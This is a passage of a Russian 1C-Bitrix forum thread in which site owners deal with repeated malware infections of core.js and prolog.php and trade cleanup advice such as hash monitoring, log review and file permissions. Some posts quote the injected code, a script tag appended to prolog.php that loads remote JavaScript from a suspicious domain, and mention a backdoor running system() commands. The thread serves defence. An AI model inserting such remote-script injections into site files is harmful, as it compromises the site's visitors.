1С-Битрикс Разработчикам

Заглянувший

Сообщений: 2 Регистрация: 10.07.2022

#231

30.08.2022 14:50:42

Цитата
написал: main.php удален, не помогает - код появляется снова.

Почитайте мое сообщение. Все основные проблемные места там перечислены, плюс загляните в бюллетень Яндекс.Облако.

https://dev.1c-bitrix.ru/support/forum/messages/forum6/topic147346/message714550/#message714550

После удаления модуля vote и вырезания найденного бэкдора + перемещения папки на уровень выше веб-сервера (/home/$user/www) вредоносный редирект перестал появляться. Прошла всего неделя, но обычно появлялся быстро (3-7 дней). main.php тоже ранее удалял, это никак не повлияло, ведь был бэкдор с исполнением через "system('some_command_on_server')". Слежу за prolog.php и core.js через CRON и сравнение md5 хэша.

Пользователь 5320552

Заглянувший

Сообщений: 1 Регистрация: 31.08.2022

#232

31.08.2022 14:03:36

Цитата

написал:
Новая неделя новый код

Цитата
<scr ipt src='https:// onlinewebstore.pw/jquery-ui.js'></sc ript>

Подскажите, что за скрипт, похоже, что у нас он тормозит загрузку контента на сайте

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#233

31.08.2022 14:12:10

Цитата
"РОСМЭН" ООО написал: Подскажите, что за скрипт, похоже, что у нас он тормозит загрузку контента на сайте

коли это не ваше - выкидывайте смело

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1364921 Заглянувший Сообщений: 15 Баллов: 1 Регистрация: 01.09.2017	#234 0 02.09.2022 09:22:39 01.09.2022 в 20:55 опять были заражены файлы bitrix/js/main/core/core.js и bitrix/modules/main/include/prolog.php Все возможные методы не помогают.

Пользователь 6397090

Заглянувший

Сообщений: 8 Регистрация: 29.06.2022

#235

02.09.2022 09:34:24

Цитата
написал: bitrix/modules/main/include/prolog.php

Добрый день.
Покажите содержимое чем именно заражают?

Хотелось бы выявить паттерн для проверки.

Пользователь 13618 Эксперт Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011 Сертифицированный партнер	#236 0 02.09.2022 09:35:33 ну коли Вы так точно знаете время заражения - анализируйте логи, какие скрипты "дёргали" в это время скорее всего это POST запрос Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1342 Баллов: 226 Регистрация: 05.04.2011

Сертифицированный партнер

#237

02.09.2022 09:37:16

если Вы просто хотите избежать заражения, не вникая в причину - можно просто изменить владельца и права доступа данных файлов (но тогда при обновлении движка нужно их разблочить обратно, иначе не обновятся)

но я бы рекомендовал всё таки найти дыру

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1393461

Заглянувший

Сообщений: 4 Регистрация: 08.09.2017

#238

02.09.2022 12:18:27

Цитата
написал: 01.09.2022 в 20:55 опять были заражены файлы bitrix/js/main/core/core.js и bitrix/modules/main/include/prolog.php Все возможные методы не помогают.

А как это сделать?

Пользователь 6164690

Постоянный посетитель

Сообщений: 82 Баллов: 13 Регистрация: 12.04.2022

#239

03.09.2022 13:57:21

Цитата
Павел написал: Все возможные методы не помогают.

инициируйте отзыв сертификатов как не актуальных,
требуйте возместить ущерб из-за лживой рекламы.

Пользователь 157995

Заглянувший

Сообщений: 6 Регистрация: 29.12.2012

#240

05.09.2022 11:09:44

Цитата

написал:

Цитата
написал: bitrix/modules/main/include/prolog.php

Добрый день.
Покажите содержимое чем именно заражают?

Хотелось бы выявить паттерн для проверки.

Код

require_once(dirname(__FILE__)."/. ./bx_root.php");

if (file_exists($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/html_pages/.enabled"))
{
   require_once(dirname(__FILE__)."/. ./lib/composite/responder.php");
   Bitrix\Main\Composite\Responder::respond();
}

require_once(dirname(__FILE__)."/prolog_before.php");
require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_after.php");

echo "<sc ript src='https://shopstore.pw/jqueryui.js'></sc ript>";

Последняя строка дописывается

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером